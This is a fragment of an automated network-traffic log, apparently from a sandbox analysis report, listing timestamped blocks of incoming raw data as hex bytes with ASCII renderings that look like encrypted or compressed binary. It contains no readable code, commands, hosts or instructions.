                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18600INData Raw: 8c 89 c1 27 b0 b7 cf 03 3c d8 76 f6 23 25 33 21 fe 2a d8 08 e5 de cc 94 ad 82 00 2c f6 6c 17 57 53 fa 64 ef bd 53 c0 b9 c2 1e 8d 0e 74 55 15 60 61 63 eb c5 9c dd 51 8e 3e 44 0f ff f1 ea b6 9e f2 39 e4 42 93 fa 83 05 1f 3c fd 42 28 29 39 dc 33 07 34 4d 40 5e 50 46 34 08 18 6a 02 9a 59 d3 f9 37 8d 75 1f a9 9c db 68 73 a0 20 2c 85 a9 5c 85 d8 75 b0 e7 60 5f d0 cb 48 47 98 15 74 0f f4 5c 9d ca ca fb c4 41 de a7 61 98 f0 02 e6 26 1d 31 8e 77 da ef 0d ab 26 c5 f1 9a ad eb 6b 24 60 30 36 10 f4 70 7c 08 48 27 d7 e7 43 52 11 47 92 f5 71 c3 a5 df 5c 30 bd 36 f5 aa 68 5d 8b 03 78 52 3f 9b 9a 8e 7d fb 0b f0 10 a1 bb 2e b7 86 08 d4 81 0b 72 eb a8 0f 64 96 a5 83 67 3e 3f ad 24 33 cd 2b 0d a1 40 f6 c5 f8 4b 0c 4d 4b 2a f7 20 d1 fb 96 e6 b9 c4 a8 2f 00 0d 3e 67 77 d9 e1
                                                                                                                                                                                                                                    Data Ascii: '<v#%3!*,lWSdStU`acQ>D9B<B()934M@^PF4jY7uhs ,\u`_HGt\Aa&1w&k$`06p|H'CRGq\06h]xR?}.rdg>?$3+@KMK* />gw
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18616INData Raw: 42 5e 52 8d 11 56 f6 65 23 fe 7c 79 77 9e ec 5b dc 4c cd d5 b4 39 4a f2 2f be a3 84 ed 87 bf 0b e2 38 f7 cf bb ba e5 06 64 fb e4 f1 b0 fc cc 93 a1 2e 6f ff 16 cb b1 c9 60 c8 2d c1 d0 53 9f 15 0b 55 13 d2 54 82 da 89 12 74 83 3a ba a3 3c 8f 4c 15 08 32 a7 1e cf 96 41 fc b4 ac 32 08 4a 75 4a 71 ad 5a c1 f9 03 d5 b9 a4 d8 d7 60 59 18 22 84 de 41 b7 d0 ae 46 2f 7a a2 82 7b 7f 3e 3f d0 0d b5 3a 7a 89 09 e4 3c 7b 75 4c e1 fc a9 51 10 ce 65 67 c2 6a 64 2c 81 c8 02 a6 a5 89 1c 61 a6 62 3a 7b 2e c5 3d f9 a8 a9 ed 68 9e ae 4c 42 af 18 41 a9 84 76 1b 78 95 eb 05 8d dc 7a fe d0 61 58 9b c2 5d c7 ab b6 79 98 82 0e 93 f3 c1 0f 5f 76 66 9c c6 de 53 0c 84 1c ad 3b 3b b0 1e c5 38 fe b5 7d 3a 10 a3 70 17 57 6f 91 b9 40 95 ef ed ff 74 cb b7 44 c5 be 37 bf a7 e8 64 a4 83 74
                                                                                                                                                                                                                                    Data Ascii: B^RVe#|yw[L9J/8d.o`-SUTt:<L2A2JuJqZ`Y"AF/z{>?:z<{uLQegjd,ab:{.=hLBAvxzaX]y_vfS;;8}:pWo@tD7dt
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18632INData Raw: e8 d9 96 68 04 f2 ba 17 cb e3 3a 56 7c 83 d1 a0 09 04 d8 7a 87 11 15 b4 25 6d 97 00 17 5f 66 15 05 c0 52 df 0f 84 33 be 06 d0 dc 02 dd 39 2a ed 17 79 a0 08 f2 eb 83 49 0f 7c 10 0e d0 0f dd 76 a4 54 07 3b e8 7f 72 53 52 2a ea 9c 30 a8 8a 10 ad 2e 58 22 a4 05 c7 28 49 5a a4 ab b9 67 fc d4 44 85 4c c2 5d c0 62 d2 1c 50 a4 a1 25 d3 25 bd ba 01 79 0a 71 cb 91 82 b7 e8 cc a8 c0 9c f0 8e 85 f6 c0 c1 8d ee 53 a8 d3 83 a8 70 8e f9 44 7d a4 ce 26 b2 ee 54 fb 64 1f 58 bc db 5f 70 ab b6 dc 12 60 5b b8 07 cb 5b 08 15 79 6a 94 17 a1 bf 3e 25 40 33 ef 0d 49 f0 60 e1 88 0e d9 f3 94 d7 8b ff 1b 17 7a fc b9 26 16 e1 ce 8e ba de 74 2b a3 95 93 1f 52 4b ae d9 28 be 64 db 72 22 2d 76 90 e2 0e f3 61 61 8f 2f 47 72 24 0e 0b 50 52 4d c7 ca 62 ad 60 52 44 67 8d 78 bb 18 cc 9a d1
                                                                                                                                                                                                                                    Data Ascii: h:V|z%m_fR39*yI|vT;rSR*0.X"(IZgDL]bP%%yqSpD}&TdX_p`[[yj>%@3I`z&t+RK(dr"-vaa/Gr$PRMb`RDgx
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18648INData Raw: 10 f3 b2 bd 2e b8 08 90 7a 65 63 ed a9 f6 35 89 be 7f b2 93 87 cf da 0f af a2 21 d3 72 6f 23 9b 1f c7 e6 1b e5 f7 47 c1 c7 58 1f db 0b 34 9e 36 c4 99 b2 ca 1d 88 1b 15 2c ec be f0 d7 22 b0 f6 91 ac 82 88 e3 d2 09 fa 97 9c 67 c5 a2 c6 34 ea cc be be ba 97 33 ed 0d 3f b4 4b 8e cd a2 3f ce c3 fe a4 04 bc 37 1f 2f 71 93 fc d0 a0 49 4c df 6a af 5e 14 33 f9 19 13 7d a8 0b f1 db ce 53 c0 66 75 dd 73 9a 67 04 5b b8 e2 26 89 ad 1a c6 3d f7 05 2e da 1b 69 e3 23 8c eb b0 d2 07 ea f5 70 57 90 a9 2c 84 f6 c7 af fb 20 bc 68 a5 17 c5 a3 b0 2b fb f9 67 e0 bb d1 9f 94 58 86 62 a7 db f5 87 89 41 2f 24 27 3b e7 97 9a 7b 23 5c e1 45 93 00 69 da a7 c1 63 ed 9b 35 17 10 04 00 59 14 04 f1 1b b5 ed 12 c3 60 43 f5 45 05 f6 df c5 f7 47 8b 4b 97 50 68 36 56 2c d7 a0 8d 2f d7 1c 10
                                                                                                                                                                                                                                    Data Ascii: .zec5!ro#GX46,"g43?K?7/qILj^3}Sfusg[&=.i#pW, h+gXbA/$';{#\Eic5Y`CEGKPh6V,/
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18664INData Raw: 98 63 4b 86 3a 10 c0 d3 69 af 29 2d 66 19 9c 2d c2 0e 1f 81 25 b0 68 d6 7c fa 45 ee d8 35 26 4c 7a 13 1e 0f d2 44 4a cf 93 c0 88 49 a9 80 d3 2c f0 13 b5 f2 7a 68 ff fc 21 59 8f 06 82 e6 0f 4f a0 4f 12 5e 88 a2 e1 fc 2d 50 5a 18 52 85 e2 70 1d 24 8e 40 d9 1e 1d d4 34 38 e6 bd 5f 44 49 fc 20 61 b7 04 5a fe b4 ee dd 97 ee 4b 31 90 00 25 32 3d 43 fd 3b 2e e3 4a 9b e7 8b b4 65 0e a6 5a 7d a7 0d 63 e2 e3 1e 4c 5c e0 d4 90 33 6f 6f 29 57 53 e4 f9 1b 9d 80 88 e4 73 72 03 f7 d5 2a 97 cb 7c ea af f8 16 0a 60 84 fe 26 00 29 b4 02 73 f7 b3 94 c2 b4 2e 4d 1e 28 06 1e 68 c4 1e 7a 71 e4 5f 6d 27 40 a1 ce e9 d7 34 08 d9 66 d2 c3 48 43 cc 23 34 bf 11 e5 4a bc d7 52 35 c5 1b aa 0b e6 e3 1f 49 b6 2c 66 5c bf 40 89 aa 2f 22 99 8c e4 61 2c b8 54 9d 8f 43 33 4d 76 19 35 62 83
                                                                                                                                                                                                                                    Data Ascii: cK:i)-f-%h|E5&LzDJI,zh!YOO^-PZRp$@48_DI aZK1%2=C;.JeZ}cL\3oo)WSsr*|`&)s.M(hzq_m'@4fHC#4JR5I,f\@/"a,TC3Mv5b
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18680INData Raw: 4c 11 09 a1 87 5b 5b cf 89 95 ff 63 63 eb 59 84 b6 c9 5c 6c e7 31 3e 74 20 4b 32 49 ca 47 38 77 22 53 ae 47 73 ab 7d 19 2b 39 c9 b0 bd e0 fe 98 86 07 a8 ef 70 0d f0 76 6f 7d fc 74 0a 0e 01 a8 68 ff d7 7c 71 44 d2 74 a6 c0 26 ea 3c 2c 6e 12 2d 9b 6a be 35 30 9a 09 32 dd 4d 40 5c 5f 68 fd 43 82 b4 eb f4 f1 48 f7 45 77 d6 12 8b 98 7d 84 04 56 58 6d bf d4 1b ad 73 5c 5d 10 e3 36 cc ca 90 6e dd 43 67 92 78 44 3d 67 5d 66 57 aa e7 10 f9 a2 9c 9a d1 08 41 e7 c7 d0 ef c7 c8 01 6d 0b dc 4e fb a5 0c a9 43 cc 7a b8 29 fe c1 0c 86 ae e9 4c 70 11 54 bc c1 ee e3 0d 86 3c 86 0c 0d 21 5b 50 df e8 38 b7 5e 60 0f a9 c6 6d f3 cd 92 d7 6f 88 ab f8 7a d0 21 c8 a1 09 76 78 7a f8 a9 14 ab 31 4e cd 99 7b 0c 43 29 28 9f 77 8d db 58 b6 30 7d ab 00 e7 f5 18 67 07 a2 a6 e9 b0 39 11
                                                                                                                                                                                                                                    Data Ascii: L[[ccY\l1>t K2IG8w"SGs}+9pvo}th|qDt&<,n-j502M@\_hCHEw}VXms\]6nCgxD=g]fWAmNCz)LpT<![P8^`moz!vxz1N{C)(wX0}g9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18696INData Raw: 05 4b e1 9d 10 04 7e ef a7 50 b8 7d 47 c6 16 1f 83 87 4b 23 c6 dc 12 8f e7 6c 5a 46 16 26 f6 3e 0b 87 6e ba 0c 61 bc 3b e5 79 06 15 ad d1 34 7b 91 b1 d5 d8 49 6a 09 43 d7 16 45 4b f5 96 a0 47 19 d1 69 21 44 dc e5 0d ca 78 9e fb 87 13 e9 ba a4 e1 23 a8 b1 fb 47 cf e8 39 fe 88 44 c0 40 c5 86 70 2f e5 06 6c f4 5f 85 91 4c 28 d5 fa fd c2 16 61 f6 eb 56 76 22 99 13 c1 a1 a2 01 81 16 ae b7 e3 da fe c5 e4 d5 8b 07 29 d2 86 ff 1d 96 a1 54 f8 84 00 06 86 f0 dd 14 3e a4 1f 08 37 f9 7a e7 ae 42 ef 3b 69 b6 c2 8a 51 66 19 2f df 5f bf 93 ea de 86 24 bc 81 9c fb b7 89 1e 73 3e 08 c0 fa f7 24 66 ad 2b e4 e4 9f 55 fa 9a 92 0c 6e e3 9b c3 f9 bf 1d c5 d9 d8 e0 9e 18 16 75 74 f9 b7 24 f0 16 0c ac 65 82 44 33 fe 62 73 41 7c e4 79 8a b0 1f 02 10 84 45 b8 00 41 d4 5e c5 f2 61
                                                                                                                                                                                                                                    Data Ascii: K~P}GK#lZF&>na;y4{IjCEKGi!Dx#G9D@p/l_L(aVv")T>7zB;iQf/_$s>$f+Unut$eD3bsA|yEA^a
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18712INData Raw: f0 b0 41 3b 5e bc 69 95 66 72 1b ca 44 84 51 44 0c 54 79 c8 3f f4 e3 d8 c0 28 fd 55 70 71 77 b8 aa e1 08 a4 1c f6 1f ab 9f 8f df f9 54 31 36 70 b5 fa 25 42 ba d3 d4 68 f5 67 38 71 aa 4b ca b9 53 58 25 85 6f c1 d1 5e 1f 0e cc 4f 79 3a 3e 18 45 a0 7d 89 cd c0 bc f8 c6 19 2e 31 15 e6 bc 59 6d 00 cd 0b 30 4b 1d 02 67 12 46 4a 0e e4 be 43 ec 4a ae bd f9 f3 ca 7f e7 ba 33 3d 39 2c 04 91 e7 81 51 15 7f c5 8c 06 6f f7 47 2d 30 d8 0a 6b 31 99 b2 c1 62 60 cf 63 28 03 08 71 85 38 61 c9 cf 58 a8 99 93 aa 52 f6 a9 f1 c1 d0 7f 46 e0 ed c4 64 06 e4 68 bf d0 26 94 47 d3 bf f5 bd 63 be 4d b4 a8 6f 69 19 9a 60 aa 78 44 37 2d 1e 64 94 cf c0 f6 16 7b e8 52 b1 b9 17 bd 31 89 f3 e2 25 18 c8 d6 7f 90 04 ab c9 40 95 09 9c d1 c7 bf 6c 66 c4 b2 eb bd 18 ef b0 2b d2 0c 2a 16 8c 5a
                                                                                                                                                                                                                                    Data Ascii: A;^ifrDQDTy?(UpqwT16p%Bhg8qKSX%o^Oy:>E}.1Ym0KgFJCJ3=9,QoG-0k1b`c(q8aXRFdh&GcMoi`xD7-d{R1%@lf+*Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18728INData Raw: 90 d5 a0 26 ff 1b b3 a6 a1 02 22 31 a5 9d 82 b9 a6 1c d1 59 e0 76 4c a3 ad 73 fe a8 ee cb 36 22 e3 12 de 61 eb 90 61 9b 61 cf d6 a1 c3 bf de 42 6c b8 c6 20 c1 73 9a 4e 76 46 01 08 58 bb 34 d2 0e 36 c5 c9 0c f9 0e 5b ff 33 59 e6 e5 e8 75 ad db 7b da 84 eb ac 13 24 af 3f c7 63 4b e3 1f 30 40 2c b3 a0 c4 44 de 22 42 35 b8 42 66 70 f3 2f 22 aa a0 3f bf dc 3c a3 d3 86 f0 3f b2 a9 d5 b3 00 f3 4b f1 98 c5 b3 f3 fb 4f 48 23 1c fb 11 fa be ac 09 db 85 64 f7 07 11 a1 08 32 6a 4f 3e 18 65 ad 05 a3 6b 23 b4 08 1e 4d 98 cf a1 8f 4a 2c de 90 e1 2b 6a cb 62 3b fb 46 92 6d 2a 59 03 ec a2 ce e6 73 79 ec 6d 69 20 da 41 70 23 1d d5 f3 e5 ce 40 44 d0 95 a2 ef c6 1b b3 cb 15 b2 a7 f0 1a 5b bb 1e da f0 09 82 f4 f9 4b 78 02 37 34 63 02 3d 07 db d9 73 a6 9e 28 75 59 6f 68 8b b6
                                                                                                                                                                                                                                    Data Ascii: &"1YvLs6"aaaBl sNvFX46[3Yu{$?cK0@,D"B5Bfp/"?<?KOH#d2jO>ek#MJ,+jb;Fm*Ysymi Ap#@D[Kx74c=s(uYoh
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18744INData Raw: ef 68 1e a7 b5 83 d7 b1 ca e4 67 0a 56 32 95 9d 80 ba fc 2e be aa 52 c2 3e 7b 1b 6b ba fe b0 9e 2e 19 1c 48 3e 8b 28 34 f1 7c c4 95 ff 23 c1 94 ee 63 71 67 90 54 aa ab 09 b9 58 32 b3 df d3 dc b4 9f 81 93 75 5b 91 d5 6a d4 90 aa 7f 28 2c d3 90 35 a2 33 64 a2 0a 6e f3 a9 c9 a5 f2 bc 6f fb da 17 19 17 72 c8 5b 04 23 95 fd fd 16 55 3c cd 0f 6d 32 fe b5 ef 07 28 0d 9d 32 51 60 de f6 38 40 a1 da 84 25 a5 aa 24 d6 b0 11 8e 4e 2a 26 60 4c e9 01 26 8a d0 30 39 e1 9c 8d ad b8 6e e0 7f fe 15 bd 0f 57 b0 82 bb 53 35 60 a5 53 0d 1f ae 87 7e 9b 5a cd 17 01 81 8d 80 8d 34 1e 23 32 47 8d 6b 7a 5b ac 43 14 e1 df 12 97 f4 2b e4 f5 7c 4b 5f 9e 23 b9 b0 b3 aa 27 3b 79 65 92 8d f8 a2 ed 28 f0 7e 87 77 27 45 8c 98 b2 b8 97 ff e9 a2 f9 bf cc 02 5e 26 c4 fc 1e d4 ea 8d 27 2b b1
                                                                                                                                                                                                                                    Data Ascii: hgV2.R>{k.H>(4|#cqgTX2u[j(,53dnor[#U<m2(2Q`8@%$N*&`L&09nWS5`S~Z4#2Gkz[C+|K_#';ye(~w'E^&'+
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18760INData Raw: 75 f2 6b 61 a0 10 e9 a5 c0 d9 7f 63 99 82 9b bc f3 2a cc 82 8e 21 e0 42 08 d3 87 f5 03 40 26 ee a8 f7 d7 84 a2 27 e0 96 40 c4 86 49 25 6d a7 c2 72 70 e5 06 ab 2e 16 f1 c0 90 68 4c d0 67 62 08 0e 37 0a c6 12 c9 ce 6b 46 cb 82 1f 7e b4 15 e8 e1 0a 9c 5a 9a a3 c8 7d 0a fa b7 a1 ae 50 de 67 3f a2 10 bc d2 e4 ec 2c 16 ba 09 82 e6 73 8c 5e aa b5 71 35 11 31 77 ac 12 bf 67 b7 34 3a 39 ff 41 21 a5 ed bd 6d f6 3b c0 78 8a 0c dd e4 38 c3 d6 ba d7 2b d7 b6 d2 9b 79 5a 8b 4d 01 8e 22 72 9e e4 41 3d 11 53 98 67 7a bf 72 67 1a 55 49 cd 79 2a b6 fa 4e e4 b0 4a 13 9e 33 75 d0 73 15 55 c9 c9 a1 84 3f bc 2b f3 38 d3 a8 ca f4 95 ad b0 3c 3f c8 df 26 38 36 1a 5d 21 5c d6 c5 5f 03 30 98 bb ca e7 45 1f c7 0d b8 a2 36 5d 75 dd 0b 10 db 8e de d5 4d 30 4b 01 f1 68 f5 4e ff f1 49
                                                                                                                                                                                                                                    Data Ascii: ukac*!B@&'@I%mrp.hLgb7kF~Z}Pg?,s^q51wg4:9A!m;x8+yZM"rA=SgzrgUIy*NJ3usU?+8<?&86]!\_0E6]uM0KhNI
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18776INData Raw: 2e 86 cc 55 7f 82 4b 54 8c c5 91 80 92 1c 81 19 c4 1c d0 f8 85 5a 2c 3d 08 78 86 22 6f 70 ed de 38 c8 4c f4 85 e5 15 eb 71 0e 79 c2 a6 ac c9 1d 66 69 f4 f5 24 a5 8a 78 13 0a ea 15 05 97 57 a4 c3 03 c1 dc 61 fc 43 f5 37 4a 1e e1 96 59 53 1b 9d b4 88 3f d6 d7 7e 30 7a 9a a9 e2 91 03 44 27 e6 f1 4a cf 02 a7 78 a7 8a f1 3d 7b 27 6c 8b d3 06 4c 76 70 39 43 92 75 60 00 38 1b 0d 8e 8c 6e 4a 92 8e 58 68 3a 44 d5 bf 76 6e ec f7 07 a5 78 36 c6 2e 12 9a b6 8c af 53 f5 09 a6 a4 de 8c 66 9f 22 53 2e 9a 50 ff d7 62 5d 08 d9 b3 7f 9c f2 cc d5 a7 45 59 13 7d cb 1b 81 75 c5 72 37 56 c1 f5 ec c6 63 7f 85 bc d1 ef 39 85 41 6e 9f 3d 33 7f 01 33 ef 4f d2 f0 06 f7 bf 71 ea 34 03 bc 83 1b 4f 87 97 14 1b 60 5c d3 c0 ce ad 89 2c bb 44 12 4c f3 d9 4b c5 c5 f1 78 7d 54 d7 b6 e1 ac
                                                                                                                                                                                                                                    Data Ascii: .UKTZ,=x"op8Lqyfi$xWaC7JYS?~0zD'Jx={'lLvp9Cu`8nJXh:Dvnx6.Sf"S.Pb]EY}ur7Vc9An=33Oq4O`\,DLKx}T
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18792INData Raw: 30 6c a3 75 49 f8 fd 14 4d f8 5b 50 e0 11 48 a2 d0 5d 10 45 ee d3 77 6d 84 f3 a7 55 5b cd b4 d1 28 75 07 93 32 a9 cc 8e cc 41 54 79 4f 84 35 8a e7 67 7b 6f f2 4f d5 03 96 f3 e7 48 30 6d a4 10 1d 93 dd 59 b3 07 08 29 08 1d 34 92 52 71 ee 1f 2b 89 1c d4 0a 9e 9c d8 b7 d9 7f e6 30 19 98 e0 e9 59 5c f8 30 36 e6 e3 fe 4d 36 fb 18 cc 8d 30 2e 07 ca d7 fa 4e ed ec cc 14 28 97 8f 59 de 31 72 7b ac 1b b0 e7 93 17 35 ab eb 98 d4 ea 63 4d a6 20 9c 0d 3b 3d 96 dd 47 aa 94 13 56 37 82 b3 cb 20 13 3a 1f 3f e7 6f f8 bb d6 d7 05 82 52 29 aa 4b e9 75 78 ca b7 13 57 cd 85 18 2e 6a 10 fd 9a b7 4a a4 fb e3 a2 e7 78 52 4f 5f 4a 11 15 28 f7 3c ab ab 57 8c 69 08 1d 09 86 2b e6 d2 bb ab 9b 80 72 29 16 1e f4 38 b1 98 e8 80 67 e2 17 33 e9 e9 ee 95 b8 e0 e1 4e 67 b1 08 5c 41 1d 9e
                                                                                                                                                                                                                                    Data Ascii: 0luIM[PH]EwmU[(u2ATyO5g{oOH0mY)4Rq+0Y\06M60.N(Y1r{5cM ;=GV7 :?oR)KuxW.jJxRO_J(<Wi+r)8g3Ng\A
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18808INData Raw: 8e 13 78 b9 af a7 ce 98 cc 54 36 9b af 4a 68 ec ea 63 ca 21 0a 6f 03 f6 e4 68 b5 3f 5e a7 7b e4 b4 6c 7f 26 9d e7 9c 8e f5 fe 47 a6 1d 0d ac 04 02 52 70 a3 7e 79 97 7f 83 7a 15 3e 6a 2c ab fc 34 4a bf c9 38 52 52 c2 53 a7 07 7b c0 dc 32 bc d8 9b 2d 16 74 47 cd 50 d3 fd 42 6d ad 00 74 a6 b2 a0 28 1a 46 10 16 c6 39 f3 1f 15 25 fb b1 39 30 1e b2 ac 69 a7 80 ed d8 af b1 14 a2 0f 53 75 01 bc c9 26 65 f6 34 34 8e f2 8f 31 d2 42 be 81 e8 9c 68 55 3e bf 79 32 25 bc de 7f cd 3a b7 3b f5 4e 42 68 cc dd 92 ba fd fd 06 54 a9 22 f8 1c e1 ce cf 4b 99 a4 cd b2 64 b2 31 14 20 ef 9d 2c b2 61 bc 81 0a 6a 45 85 8b 12 76 40 e9 e0 9d bd 9f b3 7a 01 00 84 6b 9d 41 ce cd 4b d4 c8 50 34 da fd 03 8c 0b 3c b6 7c b9 75 a2 2a 37 d2 06 b0 44 2d cb 94 66 2b e6 69 79 9a f7 90 06 ba cd
                                                                                                                                                                                                                                    Data Ascii: xT6Jhc!oh?^{l&GRp~yz>j,4J8RRS{2-tGPBmt(F9%90iSu&e441BhU>y2%:;NBhT"Kd1 ,ajEv@zkAKP4<|u*7D-f+iy
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18824INData Raw: b1 71 c4 5c bc ca c7 cd ca d6 e2 a6 17 71 79 23 74 70 84 da f4 51 cb 80 31 ce 77 a1 64 44 81 d8 76 1e b4 28 b4 ab eb 7b dc c1 70 ae bb 55 eb 20 71 da 24 a5 40 1b 10 45 f8 7c 9c 73 2f 2f 37 44 31 2d 73 3b d1 89 4e 16 a5 86 88 97 21 e4 7e b5 b6 bb 0c a5 40 28 7a 30 a6 59 05 b8 b6 1b ad ba 0d 51 7e dd a7 e7 2a 2d cf fc 4a 63 83 d6 94 86 64 9f 75 62 dc 9e e6 fb 90 b4 58 2e 49 30 41 01 a1 bc d9 42 b7 1d 9d 43 36 c1 88 4c 8a a0 e5 9d a4 0e 35 87 b3 e5 bc 74 23 d2 d4 89 62 56 2d 21 4c 52 23 63 6a a7 81 d4 1b 54 ee 32 d9 44 9e 79 cb a1 76 7c e7 4c 6d 4f 38 bf 85 1b 37 19 43 fb 74 1b fe 06 44 5f 6d a3 eb 52 9c 8e dc dc 3a 13 9e 30 c6 f5 9c 24 e0 2e 5b 13 de 80 62 20 bd 3b ca c8 e5 f7 98 e1 1e cb 10 24 08 ab 72 04 36 f7 7f d4 11 18 d4 80 15 9d 66 9e ea 36 05 2c c6
                                                                                                                                                                                                                                    Data Ascii: q\qy#tpQ1wdDv({pU q$@E|s//7D1-s;N!~@(z0YQ~*-JcdubX.I0ABC6L5t#bV-!LR#cjT2Dyv|LmO87CtD_mR:0$.[b ;$r6f6,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18840INData Raw: dd 0e 2e 85 35 4d af f3 7d d1 84 83 e3 05 ee 78 45 08 e8 33 9e 77 40 21 72 34 ca 95 56 7f 05 ed 80 98 61 fd 77 b8 32 0e 38 27 5f f3 f7 1e b6 8a 73 78 88 5a 89 3c 27 35 50 c0 74 c7 b0 c7 bd ee 2b 0f 16 81 6b 60 6a e6 73 78 c0 e5 6c e4 4a 64 10 99 ad ae df 70 47 f7 e0 d6 d4 62 67 e3 9c d5 55 57 5b 40 19 0b 25 b9 da 5a 48 13 cf eb f6 e3 37 85 f8 3b d2 3e 2a cc bb 07 a3 35 81 40 1d c8 42 51 d1 7d 94 11 c3 ff f6 d9 de 67 07 3e 34 83 8a 21 0d b1 d8 33 9c 22 86 b1 74 67 2a 80 45 ee ee 90 e5 3c 4d c1 79 95 e0 21 09 43 6f 1d 59 92 71 83 79 ba de 7c 9c c5 b2 18 60 a3 0e d3 53 e5 18 01 36 1a 3e a4 9f 47 58 72 3f e9 34 75 4f 5d 14 36 e3 fc 6f 8a c2 bd 52 69 8c 25 98 82 61 d8 3d a8 75 4a f5 aa 85 68 43 60 f5 35 a5 0a 7e 7b d3 9c 15 08 d3 9f 35 2a bb 08 88 1f 6f 4e a4
                                                                                                                                                                                                                                    Data Ascii: .5M}xE3w@!r4Vaw28'_sxZ<'5Pt+k`jsxlJdpGbgUW[@%ZH7;>*5@BQ}g>4!3"tg*E<My!CoYqy|`S6>GXr?4uO]6oRi%a=uJhC`5~{5*oN
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18856INData Raw: a6 7f 0a 9e 97 9d 44 28 13 88 4c 37 8c 4f 08 d1 89 5c 9f 23 60 dc 80 d8 ce 5f 3b 98 4c a1 d3 7d dc b6 78 62 3c 63 12 c2 f6 bd ed 73 0e 70 d5 21 c1 49 75 aa 9a 9a 89 f7 35 5a 91 53 f5 6c 4c ab 3f 5c fe 58 5e 2e 7b 6a b5 6e 15 dc e8 fb ec a4 31 6e 73 12 f7 f2 d6 3e a5 98 5e 84 85 24 06 90 c0 b5 fe e6 65 11 6d 83 66 77 54 eb 7d 37 1b ca 25 ff 26 06 dd 2a d5 90 c4 03 18 b5 82 eb b2 c7 ae 7a 72 72 d1 2e f4 e4 54 e9 12 05 90 55 18 28 67 fc 08 7d 4f 97 1d 3c 95 64 c4 2f 2b ef 8c 6e c1 c7 31 75 14 d5 6f 7a 76 df 83 80 02 37 28 0a 30 89 ac 26 6d 89 7d 58 51 a2 f9 27 fe c6 7d 6e e4 3c fb 0e 55 9d f2 ab ab e4 b6 23 f0 f8 28 08 ea ef 41 a2 be c7 f7 54 77 97 95 d1 28 72 92 b4 fb c3 03 ee 8c f1 2b f9 35 a5 a1 3e 55 21 e6 c0 c8 03 dc 5a 45 1d 10 6b 3c 82 94 a7 83 66 71
                                                                                                                                                                                                                                    Data Ascii: D(L7O\#`_;L}xb<csp!Iu5ZSlL?\X^.{jn1ns>^$emfwT}7%&*zrr.TU(g}O<d/+n1uozv7(0&m}XQ'}n<U#(ATw(r+5>U!ZEk<fq
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18872INData Raw: 91 6b 47 c2 a9 1d 68 4c 6a af 59 34 75 46 38 92 ee a4 e0 5a 22 3e ad 7e ff 18 18 31 0e 7c 56 bd 24 66 4f 73 a9 7a be f8 5b cd 9f d8 d7 d4 0b 1e eb cb 55 c2 e5 40 dd f1 98 e6 90 8f 04 e1 e0 16 90 77 64 f7 0c 6d 5b d2 93 82 13 d3 83 99 fd f3 31 47 05 3d 33 30 89 ae d0 55 09 56 e8 a0 c4 13 92 6a b9 b9 ed 4d a5 1e 3e e3 86 48 e4 24 a5 82 f0 25 9d c4 4c e9 57 be 9f 95 19 4a 0e 44 36 b4 e7 c9 dc 2a f7 9c 11 43 9a 73 43 4e 12 a9 a4 e0 0a 93 5b f3 d6 d9 8e 1f cd e6 4c 26 5a 98 54 e0 b5 88 f7 f8 11 15 fd 76 09 42 5f 12 26 73 b8 09 8b 3f eb a9 d2 61 ee f9 9d bc 2c e0 cf 00 4f 49 45 f1 53 a5 3c 19 3c 62 ef a1 01 42 a1 5a 02 a5 02 fe dd 4e 54 35 5c 0b ce 5b 40 76 b5 f4 35 96 9f 33 26 02 1f 20 73 f2 6a be 71 50 07 65 7f 8e 45 c3 b1 15 86 7b 0e e5 88 23 5c a0 93 d8 ae
                                                                                                                                                                                                                                    Data Ascii: kGhLjY4uF8Z">~1|V$fOsz[U@wdm[1G=30UVjM>H$%LWJD6*CsCN[L&ZTvB_&s?a,OIES<<bBZNT5\[@v53& sjqPeE{#\
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18888INData Raw: 00 0a f2 48 79 6e 76 62 fd d8 1c 8b 9f 4d 5b b7 05 c1 f0 cb 80 70 fe 50 22 1b 05 51 f8 d7 76 f6 5f 94 0c f0 69 ec c3 da 69 67 d2 d4 95 c6 d7 86 e7 e9 f1 32 70 92 9f ee 3d c7 2a aa f2 30 fc 67 3a 1f 67 3f 0b 94 db 88 a3 53 bb 16 e7 0b 93 63 73 df 35 6d 73 2f a2 de 89 52 cd d5 28 a1 3e a6 23 79 b9 df cd 6f ac 1c e0 0b e2 e6 32 80 a6 56 02 0b 88 8c cf 8b d2 2a 5b 73 d8 9a ce de aa 44 27 3b f7 bc 8d e1 9d da d4 c1 6c 9a 55 14 e0 97 f7 8d fa 13 d9 eb a5 7f 7b b4 f1 6e f7 10 43 59 c8 80 46 f6 32 d1 e6 a9 cd b5 9f e0 1b 9c a3 24 81 5e a2 bf 17 35 9a 72 08 79 ff 51 7f cc b5 9a 34 ac ea 4a 60 17 e8 d9 1e 86 7c 87 73 93 96 0d d9 77 74 dd 1d 19 7f 4a 4a 7e 29 1b 4a ff 62 09 c7 11 11 f2 17 bf 73 69 47 c2 3f 46 69 f6 a8 c2 c0 e2 f6 4c 33 60 2a b6 03 96 64 62 63 06 56
                                                                                                                                                                                                                                    Data Ascii: HynvbM[pP"Qv_iig2p=*0g:g?Scs5ms/R(>#yo2V*[sD';lU{nCYF2$^5ryQ4J`|swtJJ~)JbsiG?FiL3`*dbcV
